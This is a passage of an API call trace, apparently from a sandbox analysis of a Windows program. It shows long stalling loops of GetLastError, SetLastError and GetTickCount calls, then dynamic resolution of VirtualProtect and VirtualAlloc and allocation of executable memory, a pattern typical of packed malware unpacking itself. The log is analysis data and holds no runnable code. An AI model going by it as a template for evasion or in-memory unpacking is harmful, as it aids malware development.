(dwErrCode=0x0) [0101.946] GetLastError () returned 0x0 [0101.947] SetLastError (dwErrCode=0x0) [0101.947] GetLastError () returned 0x0 [0101.947] SetLastError (dwErrCode=0x0) [0101.947] GetLastError () returned 0x0 [0101.947] SetLastError (dwErrCode=0x0) [0101.947] GetLastError () returned 0x0 [0101.947] SetLastError (dwErrCode=0x0) [0101.947] GetLastError () returned 0x0 [0101.947] SetLastError (dwErrCode=0x0) [0101.947] GetLastError () returned 0x0 [0101.947] SetLastError (dwErrCode=0x0) [0101.947] GetLastError () returned 0x0 [0101.947] SetLastError (dwErrCode=0x0) [0101.947] GetLastError () returned 0x0 [0101.947] SetLastError (dwErrCode=0x0) [0101.947] GetLastError () returned 0x0 [0101.947] SetLastError (dwErrCode=0x0) [0101.947] GetLastError () returned 0x0 [0101.947] SetLastError (dwErrCode=0x0) [0101.947] GetLastError () returned 0x0 [0101.947] SetLastError (dwErrCode=0x0) [0101.947] GetLastError () returned 0x0 [0101.947] SetLastError (dwErrCode=0x0) [0101.947] GetLastError () returned 0x0 [0101.948] SetLastError (dwErrCode=0x0) [0101.948] GetLastError () returned 0x0 [0101.948] SetLastError (dwErrCode=0x0) [0101.948] GetLastError () returned 0x0 [0101.948] SetLastError (dwErrCode=0x0) [0101.948] GetLastError () returned 0x0 [0101.948] SetLastError (dwErrCode=0x0) [0101.948] GetLastError () returned 0x0 [0101.948] SetLastError (dwErrCode=0x0) [0101.948] GetLastError () returned 0x0 [0101.948] SetLastError (dwErrCode=0x0) [0101.948] GetLastError () returned 0x0 [0101.948] SetLastError (dwErrCode=0x0) [0101.948] GetLastError () returned 0x0 [0101.948] SetLastError (dwErrCode=0x0) [0101.948] GetLastError () returned 0x0 [0101.948] SetLastError (dwErrCode=0x0) [0101.948] GetLastError () returned 0x0 [0101.948] SetLastError (dwErrCode=0x0) [0101.948] GetLastError () returned 0x0 [0101.948] SetLastError (dwErrCode=0x0) [0101.948] GetLastError () returned 0x0 [0101.948] SetLastError (dwErrCode=0x0) [0101.948] GetLastError () returned 0x0 [0101.949] SetLastError (dwErrCode=0x0) [0101.949] GetLastError () returned 0x0 [0101.949] SetLastError (dwErrCode=0x0) [0101.949] GetLastError () returned 0x0 [0101.949] SetLastError (dwErrCode=0x0) [0101.949] GetLastError () returned 0x0 [0101.949] SetLastError (dwErrCode=0x0) [0101.949] GetLastError () returned 0x0 [0101.949] SetLastError (dwErrCode=0x0) [0101.949] GetLastError () returned 0x0 [0101.949] SetLastError (dwErrCode=0x0) [0101.949] GetLastError () returned 0x0 [0101.949] SetLastError (dwErrCode=0x0) [0101.949] GetLastError () returned 0x0 [0101.949] SetLastError (dwErrCode=0x0) [0101.949] GetLastError () returned 0x0 [0101.949] SetLastError (dwErrCode=0x0) [0101.949] GetLastError () returned 0x0 [0101.949] SetLastError (dwErrCode=0x0) [0101.949] GetLastError () returned 0x0 [0101.949] SetLastError (dwErrCode=0x0) [0101.949] GetLastError () returned 0x0 [0101.949] SetLastError (dwErrCode=0x0) [0101.949] GetLastError () returned 0x0 [0101.950] SetLastError (dwErrCode=0x0) [0101.950] GetLastError () returned 0x0 [0101.950] SetLastError (dwErrCode=0x0) [0101.950] GetLastError () returned 0x0 [0101.950] SetLastError (dwErrCode=0x0) [0101.950] GetLastError () returned 0x0 [0101.950] SetLastError (dwErrCode=0x0) [0101.950] GetLastError () returned 0x0 [0101.950] SetLastError (dwErrCode=0x0) [0101.950] GetLastError () returned 0x0 [0101.950] SetLastError (dwErrCode=0x0) [0101.950] GetLastError () returned 0x0 [0101.950] SetLastError (dwErrCode=0x0) [0101.950] RtlAllocateHeap (HeapHandle=0x30000, Flags=0x0, Size=0xe4) returned 0x31990 [0101.950] GetLastError () returned 0x0 [0101.950] SetLastError (dwErrCode=0x0) [0101.950] GetLastError () returned 0x0 [0101.950] SetLastError (dwErrCode=0x0) [0101.950] GetLastError () returned 0x0 [0101.950] SetLastError (dwErrCode=0x0) [0101.950] GetLastError () returned 0x0 [0101.950] SetLastError (dwErrCode=0x0) [0101.950] GetLastError () returned 0x0 [0101.950] SetLastError (dwErrCode=0x0) [0101.951] GetLastError () returned 0x0 [0101.951] SetLastError (dwErrCode=0x0) [0101.951] GetLastError () returned 0x0 [0101.951] SetLastError (dwErrCode=0x0) [0101.951] GetLastError () returned 0x0 [0101.951] SetLastError (dwErrCode=0x0) [0101.951] GetLastError () returned 0x0 [0101.951] SetLastError (dwErrCode=0x0) [0101.951] GetLastError () returned 0x0 [0101.951] SetLastError (dwErrCode=0x0) [0101.951] GetLastError () returned 0x0 [0101.951] SetLastError (dwErrCode=0x0) [0101.951] GetLastError () returned 0x0 [0101.951] SetLastError (dwErrCode=0x0) [0101.951] GetLastError () returned 0x0 [0101.951] SetLastError (dwErrCode=0x0) [0101.951] GetLastError () returned 0x0 [0101.951] SetLastError (dwErrCode=0x0) [0101.951] GetLastError () returned 0x0 [0101.951] SetLastError (dwErrCode=0x0) [0101.951] GetLastError () returned 0x0 [0101.951] SetLastError (dwErrCode=0x0) [0101.951] GetLastError () returned 0x0 [0101.952] SetLastError (dwErrCode=0x0) [0101.952] GetLastError () returned 0x0 [0101.952] SetLastError (dwErrCode=0x0) [0101.952] GetLastError () returned 0x0 [0101.952] SetLastError (dwErrCode=0x0) [0101.952] GetLastError () returned 0x0 [0101.952] SetLastError (dwErrCode=0x0) [0101.952] GetLastError () returned 0x0 [0101.952] SetLastError (dwErrCode=0x0) [0101.952] GetLastError () returned 0x0 [0101.952] SetLastError (dwErrCode=0x0) [0101.952] GetLastError () returned 0x0 [0101.952] SetLastError (dwErrCode=0x0) [0101.952] GetLastError () returned 0x0 [0101.952] SetLastError (dwErrCode=0x0) [0101.952] GetLastError () returned 0x0 [0101.952] SetLastError (dwErrCode=0x0) [0101.952] GetLastError () returned 0x0 [0101.952] SetLastError (dwErrCode=0x0) [0101.952] GetLastError () returned 0x0 [0101.952] SetLastError (dwErrCode=0x0) [0101.952] GetLastError () returned 0x0 [0101.953] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0101.953] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4037ad) returned 0x0 [0101.966] lstrlenA (lpString="") returned 0 [0101.966] GetLastError () returned 0x0 [0101.966] GetTickCount () returned 0x114e7d0 [0101.966] GetLastError () returned 0x0 [0101.966] GetTickCount () returned 0x114e7d0 [0101.966] GetLastError () returned 0x0 [0101.966] GetTickCount () returned 0x114e7d0 [0101.966] GetLastError () returned 0x0 [0101.966] GetTickCount () returned 0x114e7d0 [0101.966] GetLastError () returned 0x0 [0101.966] GetTickCount () returned 0x114e7d0 [0101.966] GetLastError () returned 0x0 [0101.967] GetTickCount () returned 0x114e7d0 [0101.967] GetLastError () returned 0x0 [0101.967] GetTickCount () returned 0x114e7d0 [0101.967] GetLastError () returned 0x0 [0101.967] GetTickCount () returned 0x114e7d0 [0101.967] GetLastError () returned 0x0 [0101.967] GetTickCount () returned 0x114e7d0 [0101.967] GetLastError () returned 0x0 [0101.967] GetTickCount () returned 0x114e7d0 [0101.967] GetLastError () returned 0x0 [0101.967] GetTickCount () returned 0x114e7d0 [0101.967] GetLastError () returned 0x0 [0101.967] GetTickCount () returned 0x114e7d0 [0101.967] GetLastError () returned 0x0 [0101.967] GetTickCount () returned 0x114e7d0 [0101.967] GetLastError () returned 0x0 [0101.967] GetTickCount () returned 0x114e7d0 [0101.967] GetLastError () returned 0x0 [0101.967] GetTickCount () returned 0x114e7d0 [0101.967] GetLastError () returned 0x0 [0101.967] GetTickCount () returned 0x114e7d0 [0101.967] GetLastError () returned 0x0 [0101.967] GetTickCount () returned 0x114e7d0 [0101.967] GetLastError () returned 0x0 [0101.967] GetTickCount () returned 0x114e7d0 [0101.967] GetLastError () returned 0x0 [0101.967] GetTickCount () returned 0x114e7d0 [0101.967] GetLastError () returned 0x0 [0101.967] GetTickCount () returned 0x114e7d0 [0101.967] GetLastError () returned 0x0 [0101.967] GetTickCount () returned 0x114e7d0 [0101.967] GetLastError () returned 0x0 [0101.967] GetTickCount () returned 0x114e7d0 [0101.967] GetLastError () returned 0x0 [0101.967] GetTickCount () returned 0x114e7d0 [0101.967] GetLastError () returned 0x0 [0101.967] GetTickCount () returned 0x114e7d0 [0101.967] GetLastError () returned 0x0 [0101.968] GetTickCount () returned 0x114e7d0 [0101.968] GetLastError () returned 0x0 [0101.968] GetTickCount () returned 0x114e7d0 [0101.968] GetLastError () returned 0x0 [0101.968] GetTickCount () returned 0x114e7d0 [0101.968] GetLastError () returned 0x0 [0101.968] GetTickCount () returned 0x114e7d0 [0101.968] GetLastError () returned 0x0 [0101.968] GetTickCount () returned 0x114e7d0 [0101.968] GetLastError () returned 0x0 [0101.968] GetTickCount () returned 0x114e7d0 [0101.968] GetLastError () returned 0x0 [0101.968] GetTickCount () returned 0x114e7d0 [0101.968] GetLastError () returned 0x0 [0101.968] GetTickCount () returned 0x114e7d0 [0101.968] GetLastError () returned 0x0 [0101.968] GetTickCount () returned 0x114e7d0 [0101.968] GetLastError () returned 0x0 [0101.968] GetTickCount () returned 0x114e7d0 [0101.968] GetLastError () returned 0x0 [0101.968] GetTickCount () returned 0x114e7d0 [0101.968] GetLastError () returned 0x0 [0101.968] GetTickCount () returned 0x114e7d0 [0101.968] GetLastError () returned 0x0 [0101.968] GetTickCount () returned 0x114e7d0 [0101.968] GetLastError () returned 0x0 [0101.968] GetTickCount () returned 0x114e7d0 [0101.968] GetLastError () returned 0x0 [0101.968] GetTickCount () returned 0x114e7d0 [0101.968] GetLastError () returned 0x0 [0101.968] GetTickCount () returned 0x114e7d0 [0101.968] GetLastError () returned 0x0 [0101.968] GetTickCount () returned 0x114e7d0 [0101.968] GetLastError () returned 0x0 [0101.968] GetTickCount () returned 0x114e7d0 [0101.968] GetLastError () returned 0x0 [0101.968] GetTickCount () returned 0x114e7d0 [0101.968] GetLastError () returned 0x0 [0101.968] GetTickCount () returned 0x114e7d0 [0101.968] GetLastError () returned 0x0 [0101.968] GetTickCount () returned 0x114e7d0 [0101.968] GetLastError () returned 0x0 [0101.968] GetTickCount () returned 0x114e7d0 [0101.968] GetLastError () returned 0x0 [0101.969] GetTickCount () returned 0x114e7d0 [0101.969] GetLastError () returned 0x0 [0101.969] GetTickCount () returned 0x114e7d0 [0101.969] GetLastError () returned 0x0 [0101.969] GetTickCount () returned 0x114e7d0 [0101.969] GetLastError () returned 0x0 [0101.969] GetTickCount () returned 0x114e7d0 [0101.969] GetLastError () returned 0x0 [0101.969] GetTickCount () returned 0x114e7d0 [0101.969] GetLastError () returned 0x0 [0101.969] GetTickCount () returned 0x114e7d0 [0101.969] GetLastError () returned 0x0 [0101.969] GetTickCount () returned 0x114e7d0 [0101.969] GetLastError () returned 0x0 [0101.969] GetTickCount () returned 0x114e7d0 [0101.969] GetLastError () returned 0x0 [0101.969] GetTickCount () returned 0x114e7d0 [0101.969] GetLastError () returned 0x0 [0101.969] GetTickCount () returned 0x114e7d0 [0101.969] GetLastError () returned 0x0 [0101.969] GetTickCount () returned 0x114e7d0 [0101.969] GetLastError () returned 0x0 [0101.969] GetTickCount () returned 0x114e7d0 [0101.969] GetLastError () returned 0x0 [0101.969] GetTickCount () returned 0x114e7d0 [0101.969] GetLastError () returned 0x0 [0101.969] GetTickCount () returned 0x114e7d0 [0101.969] GetLastError () returned 0x0 [0101.969] GetTickCount () returned 0x114e7d0 [0101.969] GetLastError () returned 0x0 [0101.969] GetTickCount () returned 0x114e7d0 [0101.969] GetLastError () returned 0x0 [0101.969] GetTickCount () returned 0x114e7d0 [0101.969] GetLastError () returned 0x0 [0101.969] GetTickCount () returned 0x114e7d0 [0101.969] GetLastError () returned 0x0 [0101.969] GetTickCount () returned 0x114e7d0 [0101.969] GetLastError () returned 0x0 [0101.970] GetTickCount () returned 0x114e7d0 [0101.970] GetLastError () returned 0x0 [0101.970] GetTickCount () returned 0x114e7d0 [0101.970] GetLastError () returned 0x0 [0101.970] GetTickCount () returned 0x114e7d0 [0101.970] GetLastError () returned 0x0 [0101.970] GetTickCount () returned 0x114e7d0 [0101.970] GetLastError () returned 0x0 [0101.970] GetTickCount () returned 0x114e7d0 [0101.970] GetLastError () returned 0x0 [0101.970] GetTickCount () returned 0x114e7d0 [0101.970] GetLastError () returned 0x0 [0101.970] GetTickCount () returned 0x114e7d0 [0101.970] GetLastError () returned 0x0 [0101.970] GetTickCount () returned 0x114e7d0 [0101.970] GetLastError () returned 0x0 [0101.970] GetTickCount () returned 0x114e7d0 [0101.970] GetLastError () returned 0x0 [0101.970] GetTickCount () returned 0x114e7d0 [0101.970] GetLastError () returned 0x0 [0101.970] GetTickCount () returned 0x114e7d0 [0101.970] GetLastError () returned 0x0 [0101.970] GetTickCount () returned 0x114e7d0 [0101.970] GetLastError () returned 0x0 [0101.970] GetTickCount () returned 0x114e7d0 [0101.970] GetLastError () returned 0x0 [0101.970] GetTickCount () returned 0x114e7d0 [0101.970] GetLastError () returned 0x0 [0101.970] GetTickCount () returned 0x114e7d0 [0101.970] GetLastError () returned 0x0 [0101.970] GetTickCount () returned 0x114e7d0 [0101.970] GetLastError () returned 0x0 [0101.970] GetTickCount () returned 0x114e7d0 [0101.970] GetLastError () returned 0x0 [0101.970] GetTickCount () returned 0x114e7d0 [0101.970] GetLastError () returned 0x0 [0101.970] GetTickCount () returned 0x114e7d0 [0101.970] GetLastError () returned 0x0 [0101.970] GetTickCount () returned 0x114e7d0 [0101.970] GetLastError () returned 0x0 [0101.970] GetTickCount () returned 0x114e7d0 [0101.970] GetLastError () returned 0x0 [0101.970] GetTickCount () returned 0x114e7d0 [0101.970] GetLastError () returned 0x0 [0101.971] GetTickCount () returned 0x114e7d0 [0101.971] GetLastError () returned 0x0 [0101.971] GetTickCount () returned 0x114e7d0 [0101.971] GetLastError () returned 0x0 [0101.971] GetTickCount () returned 0x114e7d0 [0101.971] GetLastError () returned 0x0 [0101.971] GetTickCount () returned 0x114e7d0 [0101.971] GetLastError () returned 0x0 [0101.971] GetTickCount () returned 0x114e7d0 [0101.971] GetLastError () returned 0x0 [0101.971] GetTickCount () returned 0x114e7d0 [0101.971] GetLastError () returned 0x0 [0101.971] GetTickCount () returned 0x114e7d0 [0101.971] GetLastError () returned 0x0 [0101.971] GetTickCount () returned 0x114e7d0 [0101.971] GetLastError () returned 0x0 [0101.971] GetTickCount () returned 0x114e7d0 [0101.971] GetLastError () returned 0x0 [0101.971] GetTickCount () returned 0x114e7d0 [0101.971] GetLastError () returned 0x0 [0101.971] GetTickCount () returned 0x114e7d0 [0101.971] GetLastError () returned 0x0 [0101.971] GetTickCount () returned 0x114e7d0 [0101.971] GetLastError () returned 0x0 [0101.971] GetTickCount () returned 0x114e7d0 [0101.971] GetLastError () returned 0x0 [0101.971] GetTickCount () returned 0x114e7d0 [0101.971] GetLastError () returned 0x0 [0101.971] GetTickCount () returned 0x114e7d0 [0101.971] GetLastError () returned 0x0 [0101.971] GetTickCount () returned 0x114e7d0 [0101.971] GetLastError () returned 0x0 [0101.971] GetTickCount () returned 0x114e7d0 [0101.971] GetLastError () returned 0x0 [0101.971] GetTickCount () returned 0x114e7d0 [0101.971] GetLastError () returned 0x0 [0101.971] GetTickCount () returned 0x114e7d0 [0101.971] GetLastError () returned 0x0 [0101.971] GetTickCount () returned 0x114e7d0 [0101.971] GetLastError () returned 0x0 [0101.971] GetTickCount () returned 0x114e7d0 [0101.971] GetLastError () returned 0x0 [0101.971] GetTickCount () returned 0x114e7d0 [0101.971] GetLastError () returned 0x0 [0101.972] GetTickCount () returned 0x114e7d0 [0101.972] GetLastError () returned 0x0 [0101.972] GetTickCount () returned 0x114e7d0 [0101.972] GetLastError () returned 0x0 [0101.972] GetTickCount () returned 0x114e7d0 [0101.972] GetLastError () returned 0x0 [0101.972] GetTickCount () returned 0x114e7d0 [0101.972] GetLastError () returned 0x0 [0101.972] GetTickCount () returned 0x114e7d0 [0101.972] GetLastError () returned 0x0 [0101.972] GetTickCount () returned 0x114e7d0 [0101.972] GetLastError () returned 0x0 [0101.972] GetTickCount () returned 0x114e7d0 [0101.972] GetLastError () returned 0x0 [0101.972] GetTickCount () returned 0x114e7d0 [0101.972] GetLastError () returned 0x0 [0101.972] GetTickCount () returned 0x114e7d0 [0101.972] GetLastError () returned 0x0 [0101.972] GetTickCount () returned 0x114e7d0 [0101.972] GetLastError () returned 0x0 [0101.972] GetTickCount () returned 0x114e7d0 [0101.972] GetLastError () returned 0x0 [0101.972] GetTickCount () returned 0x114e7d0 [0101.972] GetLastError () returned 0x0 [0101.972] GetTickCount () returned 0x114e7d0 [0101.972] GetLastError () returned 0x0 [0101.972] GetTickCount () returned 0x114e7d0 [0101.972] GetLastError () returned 0x0 [0101.972] GetTickCount () returned 0x114e7d0 [0101.972] GetLastError () returned 0x0 [0101.972] GetTickCount () returned 0x114e7d0 [0101.972] GetLastError () returned 0x0 [0101.972] GetTickCount () returned 0x114e7d0 [0101.972] GetLastError () returned 0x0 [0101.972] GetTickCount () returned 0x114e7d0 [0101.972] GetLastError () returned 0x0 [0101.972] GetTickCount () returned 0x114e7d0 [0101.972] GetLastError () returned 0x0 [0101.972] GetTickCount () returned 0x114e7d0 [0101.972] GetLastError () returned 0x0 [0101.972] GetTickCount () returned 0x114e7d0 [0101.973] GetLastError () returned 0x0 [0101.973] GetTickCount () returned 0x114e7d0 [0101.973] GetLastError () returned 0x0 [0101.973] GetTickCount () returned 0x114e7d0 [0101.973] GetLastError () returned 0x0 [0101.973] GetTickCount () returned 0x114e7d0 [0101.973] GetLastError () returned 0x0 [0101.973] GetTickCount () returned 0x114e7d0 [0101.973] GetLastError () returned 0x0 [0101.973] GetTickCount () returned 0x114e7d0 [0101.973] GetLastError () returned 0x0 [0101.973] GetTickCount () returned 0x114e7d0 [0101.973] GetLastError () returned 0x0 [0101.973] GetTickCount () returned 0x114e7d0 [0101.973] GetLastError () returned 0x0 [0101.973] GetTickCount () returned 0x114e7d0 [0101.973] GetLastError () returned 0x0 [0101.973] GetTickCount () returned 0x114e7d0 [0101.973] GetLastError () returned 0x0 [0101.973] GetTickCount () returned 0x114e7d0 [0101.973] GetLastError () returned 0x0 [0101.973] GetTickCount () returned 0x114e7d0 [0101.973] GetLastError () returned 0x0 [0101.973] GetTickCount () returned 0x114e7d0 [0101.973] GetLastError () returned 0x0 [0101.973] GetTickCount () returned 0x114e7d0 [0101.973] GetLastError () returned 0x0 [0101.973] GetTickCount () returned 0x114e7d0 [0101.973] GetLastError () returned 0x0 [0101.973] GetTickCount () returned 0x114e7d0 [0101.973] GetLastError () returned 0x0 [0101.973] GetTickCount () returned 0x114e7d0 [0101.973] GetLastError () returned 0x0 [0101.973] GetTickCount () returned 0x114e7d0 [0101.973] GetLastError () returned 0x0 [0101.973] GetTickCount () returned 0x114e7d0 [0101.973] GetLastError () returned 0x0 [0101.973] GetTickCount () returned 0x114e7d0 [0101.973] GetLastError () returned 0x0 [0101.973] GetTickCount () returned 0x114e7d0 [0101.973] GetLastError () returned 0x0 [0101.973] GetTickCount () returned 0x114e7d0 [0101.973] GetLastError () returned 0x0 [0101.974] GetTickCount () returned 0x114e7d0 [0101.974] GetLastError () returned 0x0 [0101.974] GetTickCount () returned 0x114e7d0 [0101.974] GetLastError () returned 0x0 [0101.974] GetTickCount () returned 0x114e7d0 [0101.974] GetLastError () returned 0x0 [0101.974] GetTickCount () returned 0x114e7d0 [0101.974] GetLastError () returned 0x0 [0101.974] GetTickCount () returned 0x114e7d0 [0101.974] GetLastError () returned 0x0 [0101.974] GetTickCount () returned 0x114e7d0 [0101.974] GetLastError () returned 0x0 [0101.974] GetTickCount () returned 0x114e7d0 [0101.974] GetLastError () returned 0x0 [0101.974] GetTickCount () returned 0x114e7d0 [0101.974] GetLastError () returned 0x0 [0101.974] GetTickCount () returned 0x114e7d0 [0101.974] GetLastError () returned 0x0 [0101.974] GetTickCount () returned 0x114e7d0 [0101.974] GetLastError () returned 0x0 [0101.974] GetTickCount () returned 0x114e7d0 [0101.974] GetLastError () returned 0x0 [0101.974] GetTickCount () returned 0x114e7d0 [0101.974] GetLastError () returned 0x0 [0101.974] GetTickCount () returned 0x114e7d0 [0101.974] GetLastError () returned 0x0 [0101.974] GetTickCount () returned 0x114e7d0 [0101.974] GetLastError () returned 0x0 [0101.974] GetTickCount () returned 0x114e7d0 [0101.974] GetLastError () returned 0x0 [0101.974] GetTickCount () returned 0x114e7d0 [0101.974] GetLastError () returned 0x0 [0101.974] GetTickCount () returned 0x114e7d0 [0101.974] GetLastError () returned 0x0 [0101.974] GetTickCount () returned 0x114e7d0 [0101.974] GetLastError () returned 0x0 [0101.974] GetTickCount () returned 0x114e7d0 [0101.974] GetLastError () returned 0x0 [0101.974] GetTickCount () returned 0x114e7d0 [0101.974] GetLastError () returned 0x0 [0101.974] GetTickCount () returned 0x114e7d0 [0101.974] GetLastError () returned 0x0 [0101.974] GetTickCount () returned 0x114e7d0 [0101.974] GetLastError () returned 0x0 [0101.975] GetTickCount () returned 0x114e7d0 [0101.975] GetLastError () returned 0x0 [0101.975] GetTickCount () returned 0x114e7d0 [0101.975] GetLastError () returned 0x0 [0101.975] GetTickCount () returned 0x114e7d0 [0101.975] GetLastError () returned 0x0 [0101.975] GetTickCount () returned 0x114e7d0 [0101.975] GetLastError () returned 0x0 [0101.975] GetTickCount () returned 0x114e7d0 [0101.975] GetLastError () returned 0x0 [0101.975] GetTickCount () returned 0x114e7d0 [0101.975] GetLastError () returned 0x0 [0101.975] GetTickCount () returned 0x114e7e0 [0101.975] GetLastError () returned 0x0 [0101.975] GetTickCount () returned 0x114e7e0 [0101.975] GetLastError () returned 0x0 [0101.975] GetTickCount () returned 0x114e7e0 [0101.975] GetLastError () returned 0x0 [0101.975] GetTickCount () returned 0x114e7e0 [0101.975] GetLastError () returned 0x0 [0101.975] GetTickCount () returned 0x114e7e0 [0101.975] GetLastError () returned 0x0 [0101.975] GetTickCount () returned 0x114e7e0 [0101.975] GetLastError () returned 0x0 [0101.975] GetTickCount () returned 0x114e7e0 [0101.975] GetLastError () returned 0x0 [0101.975] GetTickCount () returned 0x114e7e0 [0101.975] GetLastError () returned 0x0 [0101.975] GetTickCount () returned 0x114e7e0 [0101.975] GetLastError () returned 0x0 [0101.975] GetTickCount () returned 0x114e7e0 [0101.975] GetLastError () returned 0x0 [0101.975] GetTickCount () returned 0x114e7e0 [0101.975] GetLastError () returned 0x0 [0101.975] GetTickCount () returned 0x114e7e0 [0101.975] GetLastError () returned 0x0 [0101.975] GetTickCount () returned 0x114e7e0 [0101.975] GetLastError () returned 0x0 [0101.975] GetTickCount () returned 0x114e7e0 [0101.975] GetLastError () returned 0x0 [0101.975] GetTickCount () returned 0x114e7e0 [0101.975] GetLastError () returned 0x0 [0101.976] GetTickCount () returned 0x114e7e0 [0101.976] GetLastError () returned 0x0 [0101.976] GetTickCount () returned 0x114e7e0 [0101.976] GetLastError () returned 0x0 [0101.976] GetTickCount () returned 0x114e7e0 [0101.976] GetLastError () returned 0x0 [0101.976] GetTickCount () returned 0x114e7e0 [0101.976] GetLastError () returned 0x0 [0101.976] GetTickCount () returned 0x114e7e0 [0101.976] GetLastError () returned 0x0 [0101.976] GetTickCount () returned 0x114e7e0 [0101.976] GetLastError () returned 0x0 [0101.976] GetTickCount () returned 0x114e7e0 [0101.976] GetLastError () returned 0x0 [0101.976] GetTickCount () returned 0x114e7e0 [0101.976] GetLastError () returned 0x0 [0101.976] GetTickCount () returned 0x114e7e0 [0101.976] GetLastError () returned 0x0 [0101.976] GetTickCount () returned 0x114e7e0 [0101.976] GetLastError () returned 0x0 [0101.976] GetTickCount () returned 0x114e7e0 [0101.976] GetLastError () returned 0x0 [0101.976] GetTickCount () returned 0x114e7e0 [0101.976] GetLastError () returned 0x0 [0101.976] GetTickCount () returned 0x114e7e0 [0101.976] GetLastError () returned 0x0 [0101.976] GetTickCount () returned 0x114e7e0 [0101.976] GetLastError () returned 0x0 [0101.976] GetTickCount () returned 0x114e7e0 [0101.976] GetLastError () returned 0x0 [0101.976] GetTickCount () returned 0x114e7e0 [0101.976] GetLastError () returned 0x0 [0101.976] GetTickCount () returned 0x114e7e0 [0101.976] GetLastError () returned 0x0 [0101.976] GetTickCount () returned 0x114e7e0 [0101.976] GetLastError () returned 0x0 [0101.976] GetTickCount () returned 0x114e7e0 [0101.976] GetLastError () returned 0x0 [0101.976] GetTickCount () returned 0x114e7e0 [0101.976] GetLastError () returned 0x0 [0101.976] GetTickCount () returned 0x114e7e0 [0101.976] GetLastError () returned 0x0 [0101.976] GetTickCount () returned 0x114e7e0 [0101.976] GetLastError () returned 0x0 [0101.977] GetTickCount () returned 0x114e7e0 [0101.977] GetLastError () returned 0x0 [0101.977] GetTickCount () returned 0x114e7e0 [0101.977] GetLastError () returned 0x0 [0101.977] GetTickCount () returned 0x114e7e0 [0101.977] GetLastError () returned 0x0 [0101.977] GetTickCount () returned 0x114e7e0 [0101.977] GetLastError () returned 0x0 [0101.977] GetTickCount () returned 0x114e7e0 [0101.977] GetLastError () returned 0x0 [0101.977] GetTickCount () returned 0x114e7e0 [0101.977] GetLastError () returned 0x0 [0101.977] GetTickCount () returned 0x114e7e0 [0101.977] GetLastError () returned 0x0 [0101.977] GetTickCount () returned 0x114e7e0 [0101.977] GetLastError () returned 0x0 [0101.977] GetTickCount () returned 0x114e7e0 [0101.977] GetLastError () returned 0x0 [0101.977] GetTickCount () returned 0x114e7e0 [0101.977] GetLastError () returned 0x0 [0101.977] GetTickCount () returned 0x114e7e0 [0101.977] GetLastError () returned 0x0 [0101.977] GetTickCount () returned 0x114e7e0 [0101.977] GetLastError () returned 0x0 [0101.977] GetTickCount () returned 0x114e7e0 [0101.977] GetLastError () returned 0x0 [0101.977] GetTickCount () returned 0x114e7e0 [0101.977] GetLastError () returned 0x0 [0101.977] GetTickCount () returned 0x114e7e0 [0101.977] GetLastError () returned 0x0 [0101.977] GetTickCount () returned 0x114e7e0 [0101.977] GetLastError () returned 0x0 [0101.977] GetTickCount () returned 0x114e7e0 [0101.977] GetLastError () returned 0x0 [0101.977] GetTickCount () returned 0x114e7e0 [0101.977] GetLastError () returned 0x0 [0101.977] GetTickCount () returned 0x114e7e0 [0101.977] GetLastError () returned 0x0 [0101.977] GetTickCount () returned 0x114e7e0 [0101.977] GetLastError () returned 0x0 [0101.977] GetTickCount () returned 0x114e7e0 [0101.977] GetLastError () returned 0x0 [0101.977] GetTickCount () returned 0x114e7e0 [0101.977] GetLastError () returned 0x0 [0101.978] GetTickCount () returned 0x114e7e0 [0101.978] GetLastError () returned 0x0 [0101.978] GetTickCount () returned 0x114e7e0 [0101.978] GetLastError () returned 0x0 [0101.978] GetTickCount () returned 0x114e7e0 [0101.978] GetLastError () returned 0x0 [0101.978] GetTickCount () returned 0x114e7e0 [0101.978] GetLastError () returned 0x0 [0101.978] GetTickCount () returned 0x114e7e0 [0101.978] GetLastError () returned 0x0 [0101.978] GetTickCount () returned 0x114e7e0 [0101.978] GetLastError () returned 0x0 [0101.978] GetTickCount () returned 0x114e7e0 [0101.978] GetLastError () returned 0x0 [0101.978] GetTickCount () returned 0x114e7e0 [0101.978] GetLastError () returned 0x0 [0101.978] GetTickCount () returned 0x114e7e0 [0101.978] GetLastError () returned 0x0 [0101.978] GetTickCount () returned 0x114e7e0 [0101.978] GetLastError () returned 0x0 [0101.978] GetTickCount () returned 0x114e7e0 [0102.590] lstrcatA (in: lpString1="", lpString2="kernel32.dll" | out: lpString1="kernel32.dll") returned="kernel32.dll" [0102.594] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0102.597] LocalAlloc (uFlags=0x0, uBytes=0x90e4b) returned 0x210020 [0102.598] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0102.609] VirtualProtect (in: lpAddress=0x210020, dwSize=0x90e4b, flNewProtect=0x40, lpflOldProtect=0x18f1f0 | out: lpflOldProtect=0x18f1f0*=0x4) returned 1 [0102.642] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0102.642] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0102.642] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0102.642] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0102.642] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0102.642] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0102.642] GetProcAddress (hModule=0x76d30000, lpProcName="Module32First") returned 0x76dc5cd9 [0102.642] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0102.643] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x44 [0102.645] Module32First (hSnapshot=0x44, lpme=0x18f840) returned 1 [0102.647] VirtualAlloc (lpAddress=0x0, dwSize=0x119e50, flAllocationType=0x1000, flProtect=0x40) returned 0x540000 [0102.693] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0102.693] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0102.693] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0102.693] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0102.693] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0102.693] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0102.693] GetProcAddress (hModule=0x76d30000, 